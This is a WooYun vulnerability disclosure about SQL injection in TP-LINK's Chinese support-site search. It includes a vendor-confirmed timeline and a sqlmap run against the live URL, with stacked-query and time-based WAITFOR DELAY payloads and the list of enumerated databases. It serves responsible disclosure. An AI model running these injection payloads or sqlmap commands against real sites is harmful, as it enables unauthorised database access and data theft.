当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-068494

漏洞标题:TP-LINK官网某处SQL注射

相关厂商:深圳普联技术有限公司

漏洞作者: Undoit

提交时间:2014-07-14 18:44

修复时间:2014-08-28 18:46

公开时间:2014-08-28 18:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-14: 细节已通知厂商并且等待厂商处理中
2014-07-15: 厂商已经确认,细节仅向厂商公开
2014-07-25: 细节向核心白帽子及相关领域专家公开
2014-08-04: 细节向普通白帽子公开
2014-08-14: 细节向实习白帽子公开
2014-08-28: 细节向公众公开

简要描述:

TP-LINK官网某处SQL注射

详细说明:

TP-LINK官网-服务支持处存在SQL注射漏洞
注入链接:http://service.tp-link.com.cn/search.html?level1=%E6%97%A0%E7%BA%BF%E4%BA%A7%E5%93%81&level2=HyFi%E6%99%BA%E8%83%BD%E6%97%A0%E7%BA%BF&product=TL-H18E%2FTL-H18R&kw=TL
注入参数:product

C:\Sqlmap>sqlmap.py -u "http://service.tp-link.com.cn/search.html?level1=%E6%97%
A0%E7%BA%BF%E4%BA%A7%E5%93%81&level2=HyFi%E6%99%BA%E8%83%BD%E6%97%A0%E7%BA%BF&pr
oduct=TL-H18E%2FTL-H18R&kw=TL" -p product --level 3 --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:48:11
[16:48:11] [INFO] resuming back-end DBMS 'microsoft sql server'
[16:48:11] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: product
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: level1=%E6%97%A0%E7%BA%BF%E4%BA%A7%E5%93%81&level2=HyFi%E6%99%BA%E8
%83%BD%E6%97%A0%E7%BA%BF&product=TL-H18E/TL-H18R')); WAITFOR DELAY '0:0:5'--&kw=
TL
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: level1=%E6%97%A0%E7%BA%BF%E4%BA%A7%E5%93%81&level2=HyFi%E6%99%BA%E8
%83%BD%E6%97%A0%E7%BA%BF&product=TL-H18E/TL-H18R')) WAITFOR DELAY '0:0:5'--&kw=T
L
---
[16:48:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[16:48:12] [INFO] fetching database names
[16:48:12] [INFO] fetching number of databases
[16:48:12] [INFO] resumed: 10
[16:48:12] [INFO] resumed: master
[16:48:12] [INFO] resumed: modelA
[16:48:12] [INFO] resumed: msdb
[16:48:12] [INFO] resumed: ReportServer
[16:48:12] [INFO] resumed: ReportServerTempDB
[16:48:12] [INFO] resumed: ShopDemo
[16:48:12] [INFO] resumed: tempdb
[16:48:12] [INFO] resumed: TPLINK_Data
[16:48:12] [INFO] resumed: TPWebData
[16:48:12] [INFO] resumed: tpwebhelpA
available databases [10]:
[*] master
[*] modelA
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] ShopDemo
[*] tempdb
[*] TPLINK_Data
[*] TPWebData
[*] tpwebhelpA
[16:48:12] [INFO] fetched data logged to text files under 'C:\Sqlmap\output\serv
ice.tp-link.com.cn'
[*] shutting down at 16:48:12

漏洞证明:

看楼上

修复方案:

过滤

版权声明:转载请注明来源 Undoit@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-07-15 08:46

厂商回复:

谢谢反馈!

最新状态:

暂无